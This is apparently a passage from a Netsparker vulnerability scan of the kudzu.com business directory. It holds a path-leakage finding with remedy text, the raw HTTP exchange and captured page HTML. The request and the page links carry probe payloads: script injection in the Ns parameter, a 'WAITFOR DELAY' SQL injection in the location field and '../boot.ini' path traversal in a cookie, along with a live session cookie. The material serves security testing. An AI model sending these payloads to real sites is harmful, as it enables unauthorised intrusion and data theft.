<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 15</b> of <b>148</b> for
<!-- ProfileMark -->
<h1 class="results">New York plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
25
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=new%20york%20city&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=16.093470878864444">

<center>
[Possible] Internal Path Leakage (Windows)

[Possible] Internal Path Leakage (Windows)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.
  • Error messages should be disabled.
  • Remove this kind of sensitive data from the output.

External References

Classification

- /controller.jsp

/controller.jsp

Identified Internal Path(s)

c:\boot.ini

Request

GET /controller.jsp?N=0&searchVal=plumber%20electrician¤tLocation=WAITFOR%20DELAY%20%270:0:25%27--&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.kudzu.com
Cookie: logs=174.36.218.2.1326979536100593; JSESSIONID=1BD5B5BEC068570C97291D70570FCCA4.coxsearchtc1; RECENT_SEARCH=c%3A%5Cboot.ini&New+York%2C+NY+10012|..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&New+York%2C+NY+10012|plumber+electrician&New+York%2C+NY+10012; locations="ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:26:06 GMT
Server: Apache/2.0.63 (Unix) DAV/2 mod_ssl/2.0.63 OpenSSL/0.9.8e mod_jk/1.2.26
Set-Cookie: locations="ZZZStreet=&ZZZCity=Woodston&ZZZState=KS&ZZZZip=67675&ZZZLatitude=39.527596&ZZZLongitude=-99.141968&ZZZName=Woodston%2C+KS++67675&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=New York&ZZZState=NY&ZZZZip=10012&ZZZLatitude=40.720409&ZZZLongitude=-73.994637&ZZZName=New+York%2C+NY++10012&ZZZDefault=false&ZZZCookieVersion=1.0|ZZZStreet=&ZZZCity=Post&ZZZState=OR&ZZZZip=97752&ZZZLatitude=44.131691&ZZZLongitude=-120.359001&ZZZName=Post%2C+OR++97752&ZZZDefault=false&ZZZCookieVersion=1.0|"; Domain=kudzu.com; Expires=Fri, 18-Jan-2013 13:26:06 GMT; Path=/,RECENT_SEARCH=plumber+electrician&Woodston%2C+KS+67675|c%3A%5Cboot.ini&New+York%2C+NY+10012|..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini&New+York%2C+NY+10012; Domain=www.kudzu.com; Expires=Fri, 18-Jan-2013 13:26:06 GMT
Cache-Control: no-cache,max-age=0
Expires: 0
Pragma: No-cache
Transfer-Encoding: chunked
Content-Type: text/html

























<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>


<!-- google_ad_section_start -->
<title>plumber electrician in Woodston, KS - Kudzu.com</title>
<meta name="description" content="Looking for plumber electrician in Woodston, KS? Get reviews, maps & directions and more for Woodston, KS plumber electrician on Kudzu.com.">
<meta name="keywords" content="Woodston KS plumber electrician, Woodston KS plumber electrician reviews, Best plumber electrician in Woodston KS, plumber electrician locations">
<!-- google_ad_section_end -->
<meta name="ROBOTS" content="NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css?2" rel="stylesheet" type="text/css">
<link href="/css/results.css?2" rel="stylesheet" type="text/css">

<script language="JavaScript" src="/javascript/searchUtil.js"></script>
<script language="JavaScript">
function recordOmnitureEvent( companyid ) {
<!-- OnClickProfileMark-->
}

function getMoreFBReviews() {
document.getElementById('clickForMore').innerHTML = '<span style="color:gray">loading...&nbsp;&nbsp;</span>';
FacebookFriendReviews.getFriendsAndReviews( 67675, -1, 8, loadMoreFBReviews );
}

function getFBFriendReviews() {
FacebookFriendReviews.getFriendsAndReviews( 67675, -1, 3, createFBReviewsBox );
}


function facebookLoad() {
document.getElementById('fbReviewsDefault').style.display = 'none';
document.getElementById('fbReviewsBox').style.display = 'block';
getFBFriendReviews();
}

</script>
</head>


<body>


<input type="hidden" id="keyword" value="plumber electrician"/>
<input type="hidden" id="zip" value="67675"/>






























<script type='text/javascript' src='/dwr/engine.js'></script>
<script type='text/javascript' src='/dwr/util.js'></script>
<script type='text/javascript' src="/javascript/jquery/jquery-1.3.2.min.js"></script>
<script type='text/javascript' src="/javascript/jquery/qs.js"></script>
<script type='text/javascript' src='/dwr/interface/ValidateSearchParameters.js'></script>

<script>
var thirdParty = false;
</script>



<link href="/css/autoComplete.css?2" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/javascript/autocomplete/autocomplete.js"></script>


<script type="text/javascript" src="/javascript/searchScript.js"></script>
<script type="text/javascript" src="/javascript/navigation.js"></script>
<script language="javascript" src="/javascript/popup.js"></script>

<div align="center" class="bgImage">
<div id="container">
<div style="background:#fff">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td align="left" valign="middle" style="padding:5px 10px">

<iframe src="/userBar.jsp" id="userbar" height="18" width="700" scrolling="no" frameborder="0" marginheight="0" marginwidth="0"></iframe>

</td>
<td align="right" valign="middle" style="padding:5px 10px">
<a href="http://www.hgtv.com/"><img src="/img/txt_hgtvdiy.gif" border="0" /></a><br />
</td>
</tr>
<tr>
<td colspan="2" background="/img/topshadow.png"><img src="/img/spacer.gif" width="1" height="4" /><br /></td>
</tr>
</table>
</div>
<table cellpadding="0" cellspacing="0" border="0" class="topBg" width="100%">
<tr>
<td align="left" valign="top" style="width:197px;padding-top:3px">
<a href="/"><img src="/img/logo_header.jpg" border="0" /></a><br />
</td>
<td align="right" valign="top" style="padding-top:26px;padding-right:5px;width:803px">
<div style="min-height:90px">
<div class="ad728x90"><table align="center" cellpadding="0" cellspacing="0" border="0"><tr><td valign="top"><div><script language="JavaScript" type="text/JavaScript"> <!--ord=Math.random()*10000000000000000;document.write('<SCR' + 'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/kudzu.cox/cafemom;industry=cafemom;tn=1;tcs=0;tcp=0;to=h;tbw=0;te=1;s_word=cafemom;sz=728x90;ord='+ord+'?"></SCR' + 'IPT>'); //--></script></div></td></tr></table></div>
</div>
<div style="text-align:left;padding-top:27px;padding-right:5px;z-index:10">
<script language="javascript" src="/content/includes_kudzu/javascript/navigation.js"></script>
</div>
</td>
</tr>
<tr>
<td colspan="2" align="center" style="padding:25px 0px">
<div>
<form action="Javascript:Search()" name="search_terms_form">
<input name="searchBy" id="searchBy" type="hidden" value="keyword" />
<table cellspacing="0" cellpadding="0" border="0" style="width:825px">
<tr>
<td align="left" style="padding:0px 3px 0px 0px">
<div class="navtext navtext-findapro">Find a Pro:<br /></div>
</td>
<td align="left" valign="middle">
<div id="testtest_search">
<input type='text' id='searchterms' name='searchterms' value="plumber electrician" style='width:190px;font-size:14px;padding:6px;border:1px solid #999999' size='40' onblur='onSuggestionFocusLost(this)' onkeydown='onSuggestionKeyDown(this, event)' onkeyup='onSuggestionKeyUp(this, event, 4, getDataUrl_searchterms())' autocomplete='off' /><br /><div id='searchterms_suggest' class='autoComplete' ></div><script type='text/javascript' language='javascript'>function searchterms_onServerResponse() {if(req.readyState!=4) { return; }if(req.status != 200) {return;}var responseData = req.responseText;var curControl = document.getElementById('searchterms');var responseData = req.responseText;var dataValues=eval('(' + responseData + ')');populateSuggestionList(curControl, dataValues);}function getDataUrl_searchterms() {var curControl = document.getElementById('searchterms');var dataUrl = '/JQueryJsonAutoCompleteData?format=json&chosenLocationZip=67675&criteria=' + curControl.value + '&maxCount=10&providerClass=com.coxsearch.autocomplete.bll.SearchValueProvider';return dataUrl;}</script>
</div>
</td>
<td align="left" style="padding:0px 3px 0px 5px">
<div class="navtext navtext-closeto">Close to:<br /></div>
</td>
<td align="left" valign="middle" nowrap>
<div id="locations">
<input name="location" id="currentLocation" type="text" class="searchBox" style="width:190px;font-size:14px;padding:6px;border:1px solid #999999" value="Woodston, KS 67675" />
<a href="javascript:void(0);" onClick="setLocsDiv();"><img name="downButton" id="downButton" src="/img/btn_saved.gif" border="0" align="top" style="margin-top:5px;margin-left:1px" onload="setMouse()"></a>
</div>
<div style="position:relative;z-index:30">
<div name="locsDiv" id="locsDiv" style="visibility:hidden;position:absolute;z-index:1000;top:2px;background-color:#FFFFFF;border-top:1px solid #555555;border-left:1px solid #555555;border-right:2px solid #444444;border-bottom:2px solid #333333">
<div style="padding:5px">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Recent Searches:</span><br />
<div id="recentContent" style="display:none;position:relative;z-index:1010;"><iframe id= "recentframe" src="/my_recentLocationsList.jsp" width="180" height="100" scrolling="no" frameborder="0" name="content"></iframe></div><div id="noContent" style="display:none;">No recent locations</div>
</td>
<td valign="top" align="right"><img src="/img/map/cls.gif" onClick="hide_savedLocs()"></td>
</tr>
<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2">
<br />
<a href="javascript:void()" onClick="return resetCookie();">Clear recent searches</a><br />
</td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td colspan="2" width="100%"><table width="100%" cellpadding="0" cellspacing="0" bgcolor="#999999"><tr><td width="100%" bgcolor="#999999"><img src="/img/spacer.gif"></td></tr></table></td>
</tr>
<tr>
<td colspan="2" height="5"></td>
</tr>
<tr>
<td><span class="heading" style="font-weight:bold; font-size:11px;">Your Saved Locations:</span><br>
<div id="iframe" style="display:none;position:relative;z-index:1005;"><a href="/myLocationsAction.do">Please log in to use Saved Locations</a></div></td>
<td valign="top" align="right"></td>
</tr>

<tr>
<td height="3" colspan="2"></td>
</tr>
<tr>
<td colspan="2"><a href="/myLocationsAction.do">Add/Edit saved locations</a><br /></td>
</tr>
</table>
</div></div></div></td>
<td valign="middle" align="left" nowrap="nowrap" style="padding-top:2px;padding-right:10px">
<input type="submit" value="" name="submit" border="0" align="absmiddle" class="navtext navtext-search" />
</td>
<td nowrap align="left" valign="middle">

<iframe id="kadr88x31" src="/DoubleClickFrame.jsp?adType=HEADER_88X31&bucket=plumber electrician&adify=false&cafemom=false&hgtvad=false" width="88" height="31" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true"></iframe>
</td>
</tr>
<tr>
<td colspan="3">
</td>
<td align="left">
<div id="locationStatus" style="color: red;"></div>
</td>
</tr>
</table>
</form>
</div>
</td>
</tr>
</table>


<script>
$(document).ready(function() {
});
</script>



<!-- No image available for request!!! Is bucket turned on for the market?-->





<!-- loginErrorMessages.jsp -->


<!-- end loginErrorMessages.jsp -->
<table cellpadding="0" cellspacing="0" border="0" width="1000" style="text-align:left">
<tr>
<td class="refine" colspan="2"><img src="http://images.kudzu.com/img/misc/txt_refine.gif" alt="Refine" /><br /></td>
<td colspan="3" align="left" style="font-size:14px">

Displaying results <b>1 - 1</b> of <b>1</b> for
<!-- ProfileMark -->
<h1 class="results">Woodston plumber electrician</h1>
</td>
</tr>
<tr>
<!-- ExcludeProfileMark -->
<td rowspan="2" valign="top" align="left" class="leftBox">
<table cellpadding="0" cellspacing="0" border="0" width="180">
<tr>
<td valign="top" style="padding-left:10px;padding-bottom:10px">
<div class="showResults" style="margin-bottom:10px">
<div class="box4"><div class="box3"><div class="box2"><div class="box1">
<div style="padding-bottom:5px;" class="txtHeader">Show results within</div>
&nbsp;&nbsp;<select name="distance" onChange="self.location=this.options[this.selectedIndex].value" style="font-size:10px;font-family:Verdana, Helvetica, sans-serif; ">

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=WAITFOR%20DELAY%20%270:0:25%27--&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=160.93470878864446">
<center>
100
</center>
</option>


<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=WAITFOR%20DELAY%20%270:0:25%27--&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=80.46735439432223" selected>

<center>
50
</center>
</option>

<option value="/controller.jsp?searchVal=plumber%20electrician&currentLocation=WAITFOR%20DELAY%20%270:0:25%27--&searchType=keyword&Ns=P_PremiumPlacementce97c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ecf1e0696b9a&N=0&distFilter=40.233677197161114">

<center>
25
</center>
</option>

<option value="/c..